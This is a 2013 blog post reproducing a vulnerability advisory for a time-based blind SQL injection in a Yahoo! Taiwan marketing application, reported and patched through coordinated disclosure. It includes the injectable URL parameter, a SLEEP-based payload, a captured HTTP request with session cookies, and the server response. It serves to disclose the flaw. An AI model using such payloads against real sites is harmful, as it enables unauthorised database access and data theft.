Friday, 26 April 2013

Yahoo! Blind SQL Injection could lead to data leakage

 
It seems that 2013 is the "Data Leakage Year"!many customers 
information and confidential data has been published on the 
internet coming from government institutions, famous vendors, and
 companies too.

Ebrahim Hegazy(@Zigoo0) an Egyptian information security advisor
 who found a high severity vulnerability in "Avira license daemon" 
days ago, is on the news again, but this time for finding and reporting
 Blind SQL Injection vulnerability in one of Yahoo! E-marketing applications.
SQL Injection vulnerabilities is ranked as Critical vulnerabilities, because
 if used by Hackers it will cause a database breach which will lead to 
confidential information leakage.

A time based blind SQL Injection web vulnerability is detected in
 the official Yahoo! TW YSM Marketing Application Service.The vulnerability 
allows remote attackers to inject own sql commands to breach the database
 of that vulnerable application and get access to the users data.

The SQL Injection vulnerability is located in the index.php file 
of the so easy module when processing to request manipulated said
 parameters. By manipulation of the said parameter the attackers can inject own
 sql commands to compromise the webserver application dbms.

The vulnerability can be exploited by remote attackers without
 privileged application user account and without required user interaction.
 Successful exploitation of the sql injection vulnerability results in 
application and application service dbms compromise.

But Ebrahim is a white hat hacker, so he reported the vulnerability to 
the Yahoo! security team with recommendations on how to patch the vulnerability. 
 
Title:
======
Yahoo! TW YSM MKT - Blind SQL Injection Vulnerability


Common Vulnerability Scoring System:
====================================
7.1

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=892

Introduction:
=============
Yahoo! Inc. is an American multinational internet corporation 
headquartered in Sunnyvale, California. It is widely 
known for its web portal, search engine Yahoo! Search, and
 related services, including Yahoo! Directory, Yahoo! Mail, 
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising,
 online mapping, video sharing, fantasy sports 
and its social media website. It is one of the most popular sites in the
 United States.
 According to news sources, 
roughly 700 million people visit Yahoo! websites every month. Yahoo! 
itself claims it attracts `more than half a 
billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )

Report-Timeline:
================
2013-02-24: Researcher Notification & Coordination
2013-02-25: Vendor Notification
2013-03-01: Vendor Response/Feedback
2013-04-01: Vendor Fix/Patch by check
2013-04-03: Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
A time based blind SQL Injection web vulnerability is 
detected in the official Yahoo!
 TW YSM Marketing Application Service.
The vulnerability allows remote attackers to inject 
own sql commands to compromise the affected application dbms. 

The SQL Injection vulnerability is located in the index.php file
 of the so easy module when processing to request manipulated 
scId parameters. By manipulation of the said
 parameter the attackers can inject own sql commands
 to compromise the webserver 
application dbms.

The vulnerability can be exploited by remote attackers 
without privileged application user account and without required 
user interaction. Successful exploitation of the sql 
injection vulnerability results in application and application 
service dbms compromise.

Vulnerable Service(s):
    [+] Yahoo! Inc - TW YSM Marketing

Vulnerable Module(s):
    [+] soeasy

Vulnerable Module(s):
    [+] index.php

Vulnerable Parameter(s):
    [+] scId


Proof of Concept:
=================
The time-based sql injection web vulnerability 
can be exploited by remote attackers without privileged 
application user account and without 
required user interaction. For demonstration or reproduce ...

Vulnerable Service Domain:  tw.ysm.emarketing.yahoo.com
Vulnerable Module:   soeasy
Vulnerable File:   index.php
Vulnerable Parameters:   ?p=2&scId=

POC:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113;
 select SLEEP(5)--

Payload:
1; union select SLEEP(5)--


Request:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113;%20select%20SLEEP
(5)--

GET /soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1
Host: tw.ysm.emarketing.yahoo.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0)
 Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: is_c=1; device=pc; showNews=Y;
 B=9tgpb118xilu04&b=3&s=mu; AO=o=1&s=1&dnt=1;
 tw_ysm_soeasy=d%3D351d9185185129780476f856.
17880929%26s%3DxLxK2mb96diFbErWUyv_jGQ--;
 __utma=266114698.145757337399.1361672202.1361672202.1361672202.1;
 __utmb=2663114698.
1.10.1361672202; __utmc=2636114698;
 __utmz=266114698.13616732202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
DNT: 1
Connection: keep-alive

HTTP/1.0 200 OK
Date: Sun, 24 Feb 2013 02:16:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml",
 CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi 
SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV
 INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-store, no-cache, must-revalidate
, post-check=0, pre-check=0, private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip


Note:
Since it'a time based blind so the page will
 not give an output as a result in the reply,
 but it will SLEEP/DELAY for 5 seconds before it load.


Solution:
=========
The vulnerability can be patched by a restriction 
and secure parse of the said parameter request.


Risk:
=====
The security risk of the time based
 blind sql injection web vulnerability is estimated as critical.


Credits:
========
Ebrahim Hegazy(@Zigoo0) 

Thanks for Vulnerability-laboratory Team

No comments:

Post a Comment